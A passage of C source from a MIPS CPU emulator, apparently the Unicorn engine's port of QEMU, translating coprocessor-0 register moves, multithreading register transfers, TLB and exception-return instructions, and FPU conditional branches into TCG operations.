CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_0e1i(mtc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_20: switch (sel) { case CP0_REG20__XCONTEXT: check_insn(ctx, ISA_MIPS3); gen_helper_mtc0_xcontext(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "XContext"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_21: /* Officially reserved, but sel 0 is used for R1x000 framemask */ CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); switch (sel) { case 0: gen_helper_mtc0_framemask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Framemask"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_22: /* ignored */ //register_name = "Diagnostic"; /* implementation dependent */ break; case CP0_REGISTER_23: switch (sel) { case CP0_REG23__DEBUG: gen_helper_mtc0_debug(tcg_ctx, tcg_ctx->cpu_env, arg); /* EJTAG support */ /* DISAS_STOP isn't good enough here, hflags may have changed. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Debug"; break; case CP0_REG23__TRACECONTROL: /* PDtrace support */ /* gen_helper_mtc0_tracecontroltcg_ctx, (tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceControl"; goto cp0_unimplemented; case CP0_REG23__TRACECONTROL2: /* PDtrace support */ /* gen_helper_mtc0_tracecontrol2(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceControl2"; goto cp0_unimplemented; case CP0_REG23__USERTRACEDATA1: /* PDtrace support */ /* gen_helper_mtc0_usertracedata1(tcg_ctx, tcg_ctx->cpu_env, arg);*/ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "UserTraceData1"; goto cp0_unimplemented; case CP0_REG23__TRACEIBPC: /* PDtrace support */ /* gen_helper_mtc0_traceibpc(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceIBPC"; goto cp0_unimplemented; case CP0_REG23__TRACEDBPC: /* PDtrace support */ /* gen_helper_mtc0_tracedbpc(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceDBPC"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_24: switch (sel) { case CP0_REG24__DEPC: /* EJTAG support */ tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); //register_name = "DEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_25: switch (sel) { case CP0_REG25__PERFCTL0: gen_helper_mtc0_performance0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Performance0"; break; case CP0_REG25__PERFCNT0: /* gen_helper_mtc0_performance1(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance1"; goto cp0_unimplemented; case CP0_REG25__PERFCTL1: /* gen_helper_mtc0_performance2(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance2"; goto cp0_unimplemented; case CP0_REG25__PERFCNT1: /* gen_helper_mtc0_performance3(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance3"; goto cp0_unimplemented; case CP0_REG25__PERFCTL2: /* gen_helper_mtc0_performance4(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance4"; goto cp0_unimplemented; case CP0_REG25__PERFCNT2: /* gen_helper_mtc0_performance5(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance5"; goto cp0_unimplemented; case CP0_REG25__PERFCTL3: /* gen_helper_mtc0_performance6(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance6"; goto cp0_unimplemented; case CP0_REG25__PERFCNT3: /* gen_helper_mtc0_performance7(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "Performance7"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_26: switch (sel) { case CP0_REG26__ERRCTL: gen_helper_mtc0_errctl(tcg_ctx, tcg_ctx->cpu_env, arg); ctx->base.is_jmp = DISAS_STOP; //register_name = "ErrCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_27: switch (sel) { case CP0_REG27__CACHERR: /* ignored */ //register_name = "CacheErr"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case CP0_REG28__TAGLO: case CP0_REG28__TAGLO1: case CP0_REG28__TAGLO2: case CP0_REG28__TAGLO3: gen_helper_mtc0_taglo(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TagLo"; break; case CP0_REG28__DATALO: case CP0_REG28__DATALO1: case CP0_REG28__DATALO2: case CP0_REG28__DATALO3: gen_helper_mtc0_datalo(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "DataLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_29: switch (sel) { case CP0_REG29__TAGHI: case CP0_REG29__TAGHI1: case CP0_REG29__TAGHI2: case CP0_REG29__TAGHI3: gen_helper_mtc0_taghi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TagHi"; break; case CP0_REG29__DATAHI: case CP0_REG29__DATAHI1: case CP0_REG29__DATAHI2: case CP0_REG29__DATAHI3: gen_helper_mtc0_datahi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "DataHi"; break; default: //register_name = "invalid sel"; goto cp0_unimplemented; } break; case CP0_REGISTER_30: switch (sel) { case CP0_REG30__ERROREPC: tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); //register_name = "ErrorEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_31: switch (sel) { case CP0_REG31__DESAVE: /* EJTAG support */ gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); //register_name = "DESAVE"; break; case CP0_REG31__KSCRATCH1: case CP0_REG31__KSCRATCH2: case CP0_REG31__KSCRATCH3: case CP0_REG31__KSCRATCH4: case CP0_REG31__KSCRATCH5: case CP0_REG31__KSCRATCH6: CP0_CHECK(ctx->kscrexist & (1 << sel)); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_KScratch[sel - 2])); //register_name = "KScratch"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } /* For simplicity assume that all writes can cause interrupts. */ if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { /* * DISAS_STOP isn't sufficient, we need to ensure we break out of * translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; } return; cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "dmtc0 %s (reg %d sel %d)\n", //register_name, reg, sel); return; } #endif /* TARGET_MIPS64 */ static void gen_mftr(CPUMIPSState *env, DisasContext *ctx, int rt, int rd, int u, int sel, int h) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); TCGv t0 = tcg_temp_local_new(tcg_ctx); if ((env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) == 0 && ((env->tcs[other_tc].CP0_TCBind & (0xf << CP0TCBd_CurVPE)) != (env->active_tc.CP0_TCBind & (0xf << CP0TCBd_CurVPE)))) { tcg_gen_movi_tl(tcg_ctx, t0, -1); } else if ((env->CP0_VPEControl & (0xff << CP0VPECo_TargTC)) > (env->mvp->CP0_MVPConf0 & (0xff << CP0MVPC0_PTC))) { tcg_gen_movi_tl(tcg_ctx, t0, -1); } else if (u == 0) { switch (rt) { case 1: switch (sel) { case 1: gen_helper_mftc0_vpecontrol(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 2: gen_helper_mftc0_vpeconf0(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; break; } break; case 2: switch (sel) { case 1: gen_helper_mftc0_tcstatus(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 2: gen_helper_mftc0_tcbind(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 3: gen_helper_mftc0_tcrestart(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 4: gen_helper_mftc0_tchalt(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 5: gen_helper_mftc0_tccontext(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 6: gen_helper_mftc0_tcschedule(tcg_ctx, t0, tcg_ctx->cpu_env); break; case 7: gen_helper_mftc0_tcschefback(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: gen_mfc0(ctx, t0, rt, sel); break; } break; case 10: switch (sel) { case 0: gen_helper_mftc0_entryhi(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: gen_mfc0(ctx, t0, rt, sel); break; } break; case 12: switch (sel) { case 0: gen_helper_mftc0_status(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: gen_mfc0(ctx, t0, rt, sel); break; } break; case 13: switch (sel) { case 0: gen_helper_mftc0_cause(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; break; } break; case 14: switch (sel) { case 0: gen_helper_mftc0_epc(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; break; } break; case 15: switch (sel) { case 1: gen_helper_mftc0_ebase(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; break; } break; case 16: switch (sel) { case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: gen_helper_mftc0_configx(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_const_tl(tcg_ctx, sel)); break; default: goto die; break; } break; case 23: switch (sel) { case 0: gen_helper_mftc0_debug(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: gen_mfc0(ctx, t0, rt, sel); break; } break; default: gen_mfc0(ctx, t0, rt, sel); } } else { switch (sel) { /* GPR registers. */ case 0: gen_helper_1e0i(mftgpr, t0, rt); break; /* Auxiliary CPU registers */ case 1: switch (rt) { case 0: gen_helper_1e0i(mftlo, t0, 0); break; case 1: gen_helper_1e0i(mfthi, t0, 0); break; case 2: gen_helper_1e0i(mftacx, t0, 0); break; case 4: gen_helper_1e0i(mftlo, t0, 1); break; case 5: gen_helper_1e0i(mfthi, t0, 1); break; case 6: gen_helper_1e0i(mftacx, t0, 1); break; case 8: gen_helper_1e0i(mftlo, t0, 2); break; case 9: gen_helper_1e0i(mfthi, t0, 2); break; case 10: gen_helper_1e0i(mftacx, t0, 2); break; case 12: gen_helper_1e0i(mftlo, t0, 3); break; case 13: gen_helper_1e0i(mfthi, t0, 3); break; case 14: gen_helper_1e0i(mftacx, t0, 3); break; case 16: gen_helper_mftdsp(tcg_ctx, t0, tcg_ctx->cpu_env); break; default: goto die; } break; /* Floating point (COP1). */ case 2: /* XXX: For now we support only a single FPU context. */ if (h == 0) { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, rt); tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); tcg_temp_free_i32(tcg_ctx, fp0); } else { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, rt); tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); tcg_temp_free_i32(tcg_ctx, fp0); } break; case 3: /* XXX: For now we support only a single FPU context. */ gen_helper_1e0i(cfc1, t0, rt); break; /* COP2: Not implemented. */ case 4: case 5: /* fall through */ default: goto die; } } gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); return; die: tcg_temp_free(tcg_ctx, t0); LOG_DISAS("mftr (reg %d u %d sel %d h %d)\n", rt, u, sel, h); generate_exception_end(ctx, EXCP_RI); } static void gen_mttr(CPUMIPSState *env, DisasContext *ctx, int rd, int rt, int u, int sel, int h) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); TCGv t0 = tcg_temp_local_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); if ((env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) == 0 && ((env->tcs[other_tc].CP0_TCBind & (0xf << CP0TCBd_CurVPE)) != (env->active_tc.CP0_TCBind & (0xf << CP0TCBd_CurVPE)))) { /* NOP */ ; } else if ((env->CP0_VPEControl & (0xff << CP0VPECo_TargTC)) > (env->mvp->CP0_MVPConf0 & (0xff << CP0MVPC0_PTC))) { /* NOP */ ; } else if (u == 0) { switch (rd) { case 1: switch (sel) { case 1: gen_helper_mttc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 2: gen_helper_mttc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: goto die; break; } break; case 2: switch (sel) { case 1: gen_helper_mttc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 2: gen_helper_mttc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 3: gen_helper_mttc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 4: gen_helper_mttc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 5: gen_helper_mttc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 6: gen_helper_mttc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 7: gen_helper_mttc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_mtc0(ctx, t0, rd, sel); break; } break; case 10: switch (sel) { case 0: gen_helper_mttc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_mtc0(ctx, t0, rd, sel); break; } break; case 12: switch (sel) { case 0: gen_helper_mttc0_status(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_mtc0(ctx, t0, rd, sel); break; } break; case 13: switch (sel) { case 0: gen_helper_mttc0_cause(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: goto die; break; } break; case 15: switch (sel) { case 1: gen_helper_mttc0_ebase(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: goto die; break; } break; case 23: switch (sel) { case 0: gen_helper_mttc0_debug(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_mtc0(ctx, t0, rd, sel); break; } break; default: gen_mtc0(ctx, t0, rd, sel); } } else { switch (sel) { /* GPR registers. */ case 0: gen_helper_0e1i(mttgpr, t0, rd); break; /* Auxiliary CPU registers */ case 1: switch (rd) { case 0: gen_helper_0e1i(mttlo, t0, 0); break; case 1: gen_helper_0e1i(mtthi, t0, 0); break; case 2: gen_helper_0e1i(mttacx, t0, 0); break; case 4: gen_helper_0e1i(mttlo, t0, 1); break; case 5: gen_helper_0e1i(mtthi, t0, 1); break; case 6: gen_helper_0e1i(mttacx, t0, 1); break; case 8: gen_helper_0e1i(mttlo, t0, 2); break; case 9: gen_helper_0e1i(mtthi, t0, 2); break; case 10: gen_helper_0e1i(mttacx, t0, 2); break; case 12: gen_helper_0e1i(mttlo, t0, 3); break; case 13: gen_helper_0e1i(mtthi, t0, 3); break; case 14: gen_helper_0e1i(mttacx, t0, 3); break; case 16: gen_helper_mttdsp(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: goto die; } break; /* Floating point (COP1). */ case 2: /* XXX: For now we support only a single FPU context. */ if (h == 0) { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32(ctx, fp0, rd); tcg_temp_free_i32(tcg_ctx, fp0); } else { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32h(ctx, fp0, rd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case 3: /* XXX: For now we support only a single FPU context. */ { TCGv_i32 fs_tmp = tcg_const_i32(tcg_ctx, rd); gen_helper_0e2i(ctc1, t0, fs_tmp, rt); tcg_temp_free_i32(tcg_ctx, fs_tmp); } /* Stop translation as we may have changed hflags */ ctx->base.is_jmp = DISAS_STOP; break; /* COP2: Not implemented. */ case 4: case 5: /* fall through */ default: goto die; } } tcg_temp_free(tcg_ctx, t0); return; die: tcg_temp_free(tcg_ctx, t0); LOG_DISAS("mttr (reg %d u %d sel %d h %d)\n", rd, u, sel, h); generate_exception_end(ctx, EXCP_RI); } static void gen_cp0(CPUMIPSState *env, DisasContext *ctx, uint32_t opc, int rt, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; const char *opn = "ldst"; check_cp0_enabled(ctx); switch (opc) { case OPC_MFC0: if (rt == 0) { /* Treat as NOP. */ return; } gen_mfc0(ctx, tcg_ctx->cpu_gpr[rt], rd, ctx->opcode & 0x7); opn = "mfc0"; break; case OPC_MTC0: { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_mtc0(ctx, t0, rd, ctx->opcode & 0x7); tcg_temp_free(tcg_ctx, t0); } opn = "mtc0"; break; #if defined(TARGET_MIPS64) case OPC_DMFC0: check_insn(ctx, ISA_MIPS3); if (rt == 0) { /* Treat as NOP. */ return; } gen_dmfc0(ctx, tcg_ctx->cpu_gpr[rt], rd, ctx->opcode & 0x7); opn = "dmfc0"; break; case OPC_DMTC0: check_insn(ctx, ISA_MIPS3); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_dmtc0(ctx, t0, rd, ctx->opcode & 0x7); tcg_temp_free(tcg_ctx, t0); } opn = "dmtc0"; break; #endif case OPC_MFHC0: check_mvh(ctx); if (rt == 0) { /* Treat as NOP. */ return; } gen_mfhc0(ctx, tcg_ctx->cpu_gpr[rt], rd, ctx->opcode & 0x7); opn = "mfhc0"; break; case OPC_MTHC0: check_mvh(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_mthc0(ctx, t0, rd, ctx->opcode & 0x7); tcg_temp_free(tcg_ctx, t0); } opn = "mthc0"; break; case OPC_MFTR: check_cp0_enabled(ctx); if (rd == 0) { /* Treat as NOP. */ return; } gen_mftr(env, ctx, rt, rd, (ctx->opcode >> 5) & 1, ctx->opcode & 0x7, (ctx->opcode >> 4) & 1); opn = "mftr"; break; case OPC_MTTR: check_cp0_enabled(ctx); gen_mttr(env, ctx, rd, rt, (ctx->opcode >> 5) & 1, ctx->opcode & 0x7, (ctx->opcode >> 4) & 1); opn = "mttr"; break; case OPC_TLBWI: opn = "tlbwi"; if (!env->tlb->helper_tlbwi) { goto die; } gen_helper_tlbwi(tcg_ctx, tcg_ctx->cpu_env); break; case OPC_TLBINV: opn = "tlbinv"; if (ctx->ie >= 2) { if (!env->tlb->helper_tlbinv) { goto die; } gen_helper_tlbinv(tcg_ctx, tcg_ctx->cpu_env); } /* treat as nop if TLBINV not supported */ break; case OPC_TLBINVF: opn = "tlbinvf"; if (ctx->ie >= 2) { if (!env->tlb->helper_tlbinvf) { goto die; } gen_helper_tlbinvf(tcg_ctx, tcg_ctx->cpu_env); } /* treat as nop if TLBINV not supported */ break; case OPC_TLBWR: opn = "tlbwr"; if (!env->tlb->helper_tlbwr) { goto die; } gen_helper_tlbwr(tcg_ctx, tcg_ctx->cpu_env); break; case OPC_TLBP: opn = "tlbp"; if (!env->tlb->helper_tlbp) { goto die; } gen_helper_tlbp(tcg_ctx, tcg_ctx->cpu_env); break; case OPC_TLBR: opn = "tlbr"; if (!env->tlb->helper_tlbr) { goto die; } gen_helper_tlbr(tcg_ctx, tcg_ctx->cpu_env); break; case OPC_ERET: /* OPC_ERETNC */ if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { goto die; } else { int bit_shift = (ctx->hflags & MIPS_HFLAG_M16) ? 16 : 6; if (ctx->opcode & (1 << bit_shift)) { /* OPC_ERETNC */ opn = "eretnc"; check_insn(ctx, ISA_MIPS32R5); gen_helper_eretnc(tcg_ctx, tcg_ctx->cpu_env); } else { /* OPC_ERET */ opn = "eret"; check_insn(ctx, ISA_MIPS2); gen_helper_eret(tcg_ctx, tcg_ctx->cpu_env); } ctx->base.is_jmp = DISAS_EXIT; } break; case OPC_DERET: opn = "deret"; check_insn(ctx, ISA_MIPS32); if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { goto die; } if (!(ctx->hflags & MIPS_HFLAG_DM)) { MIPS_INVAL(opn); generate_exception_end(ctx, EXCP_RI); } else { gen_helper_deret(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_EXIT; } break; case OPC_WAIT: opn = "wait"; check_insn(ctx, ISA_MIPS3 | ISA_MIPS32); if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { goto die; } /* If we get an exception, we want to restart at next instruction */ ctx->base.pc_next += 4; save_cpu_state(ctx, 1); ctx->base.pc_next -= 4; gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; break; default: die: MIPS_INVAL(opn); generate_exception_end(ctx, EXCP_RI); return; } (void)opn; /* avoid a compiler warning */ } /* CP1 Branches (before delay slot) */ static void gen_compute_branch1(DisasContext *ctx, uint32_t op, int32_t cc, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btarget; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { generate_exception_end(ctx, EXCP_RI); goto out; } if (cc != 0) { check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); } btarget = ctx->base.pc_next + 4 + offset; switch (op) { case OPC_BC1F: tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_not_i32(tcg_ctx, t0, t0); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); goto not_likely; case OPC_BC1FL: tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_not_i32(tcg_ctx, t0, t0); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); goto likely; case OPC_BC1T: tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); goto not_likely; case OPC_BC1TL: tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); likely: ctx->hflags |= MIPS_HFLAG_BL; break; case OPC_BC1FANY2: { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 1)); tcg_gen_nand_i32(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); } goto not_likely; case OPC_BC1TANY2: { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 1)); tcg_gen_or_i32(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); } goto not_likely; case OPC_BC1FANY4: { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 1)); tcg_gen_and_i32(tcg_ctx, t0, t0, t1); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 2)); tcg_gen_and_i32(tcg_ctx, t0, t0, t1); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 3)); tcg_gen_nand_i32(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); } goto not_likely; case OPC_BC1TANY4: { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 1)); tcg_gen_or_i32(tcg_ctx, t0, t0, t1); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 2)); tcg_gen_or_i32(tcg_ctx, t0, t0, t1); tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc + 3)); tcg_gen_or_i32(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->bcond, t0); } not_likely: ctx->hflags |= MIPS_HFLAG_BC; break; default: MIPS_INVAL("cp1 cond branch"); generate_exception_end(ctx, EXCP_RI); goto out; } ctx->btarget = btarget; ctx->hflags |= MIPS_HFLAG_BDS32; out: tcg_temp_free_i32(tcg_ctx, t0); } /* R6 CP1 Branches */ static void gen_compute_branch1_r6(DisasContext *ctx, uint32_t op, int32_t ft, int32_t offset, int delayslot_size) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btarget; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); if (ctx->hflags & MIPS_HFLAG_BMASK) { #ifdef MIPS_DEBUG_DISAS LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx "\n", ctx->base.pc_next); #endif generate_exception_end(ctx, EXCP_RI); goto out; } gen_load_fpr64(ctx, t0, ft); tcg_gen_andi_i64(tcg_ctx, t0, t0, 1); btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); switch (op) { case OPC_BC1EQZ: tcg_gen_xori_i64(tcg_ctx, t0, t0, 1); ctx->hflags |= MIPS_HFLAG_BC; break; case OPC_BC1NEZ: /* t0 already set */ ctx->hflags |= MIPS_HFLAG_BC; break; default: MIPS_INVAL("cp1 cond branch"); generate_exception_end(ctx, EXCP_RI); goto out; } tcg_gen_trunc_i64_tl(tcg_ctx, tcg_ctx->bcond, t0); ctx->btarget = btarget; switch (delayslot_size) { case 2: ctx->hflags |= MIPS_HFLAG_BDS16; break; case 4: ctx->hflags |= MIPS_HFLAG_BDS32; break; } out: tcg_temp_free_i64(tcg_ctx, t0); } /* Coprocessor 1 (FPU) */ #define FOP(func, fmt) (((fmt) << 21) | (func)) enum fopcode { OPC_ADD_S = FOP(0, FMT_S), OPC_SUB_S = FOP(1, FMT_S), OPC_MUL_S = FOP(2, FMT_S), OPC_DIV_S = FOP(3, FMT_S), OPC_SQRT_S = FOP(4, FMT_S), OPC_ABS_S = FOP(5, FMT_S), OPC_MOV_S = FOP(6, FMT_S), OPC_NEG_S = FOP(7, FMT_S), OPC_ROUND_L_S = FOP(8, FMT_S), OPC_TRUNC_L_S = FOP(9, FMT_S), OPC_CEIL_L_S = FOP(10, FMT_S), OPC_FLOOR_L_S = FOP(11, FMT_S), OPC_ROUND_W_S = FOP(12, FMT_S), OPC_TRUNC_W_S = FOP(13, FMT_S), OPC_CEIL_W_S = FOP(14, FMT_S), OPC_FLOOR_W_S = FOP(15, FMT_S), OPC_SEL_S = FOP(16, FMT_S), OPC_MOVCF_S = FOP(17, FMT_S), OPC_MOVZ_S = FOP(18, FMT_S), OPC_MOVN_S = FOP(19, FMT_S), OPC_SELEQZ_S = FOP(20, FMT_S), OPC_RECIP_S = FOP(21, FMT_S), OPC_RSQRT_S = FOP(22, FMT_S), OPC_SELNEZ_S = FOP(23, FMT_S), OPC_MADDF_S = FOP(24, FMT_S), OPC_MSUBF_S = FOP(25, FMT_S), OPC_RINT_S = FOP(26, FMT_S), OPC_CLASS_S = FOP(27, FMT_S), OPC_MIN_S = FOP(28, FMT_S), OPC_RECIP2_S = FOP(28, FMT_S), OPC_MINA_S = FOP(29, FMT_S), OPC_RECIP1_S = FOP(29, FMT_S), OPC_MAX_S = FOP(30, FMT_S), OPC_RSQRT1_S = FOP(30, FMT_S), OPC_MAXA_S = FOP(31, FMT_S), OPC_RSQRT2_S = FOP(31, FMT_S), OPC_CVT_D_S = FOP(33, FMT_S), 